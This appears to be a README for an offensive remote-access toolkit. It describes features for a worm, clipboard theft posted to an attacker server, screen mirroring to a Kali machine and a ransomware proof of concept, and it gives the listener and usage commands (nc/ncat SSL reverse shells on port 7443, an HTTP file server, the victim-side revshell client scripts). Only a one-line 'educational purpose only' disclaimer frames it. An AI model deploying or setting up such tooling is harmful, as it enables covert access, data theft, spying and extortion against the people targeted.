EDUCATIONAL PURPOSE ONLY and IF YOU HAVE PERMISSION
Intergrated Commandes
-Worm itr self( new port and create child process) # TODO Make the Process independant
-ClippyON ClippyOFF Send the clipboard to a server as POST Server Need to be ON( sudo python3 ServerHttp_Content.py 80 ) For exemple
-CreapyON CreapyOFF Screen Mirror to the attacker machine // Kali needs to pip3 install ssm
-Ransom Is for the Ransom -> DO NOT USE IT IS A POC ONLY
sudo python3 ServerHttp_Content.py 80 -> Clippy
nc --ssl -lvnp 7443 -> SSL Shell
python3 -m http.server 9090 -> FileServer to Upload and Download
python3 ServerScreenShoot.py --> Creapy // SCreen Mirroring
usage victim python revshell_client_win.py # change the IP and PORT Kali nc -lvnp 7443
victim
python revshell_client_win_ssl.py # change the IP and PORT
Kali
ncat --ssl -lvp 7443

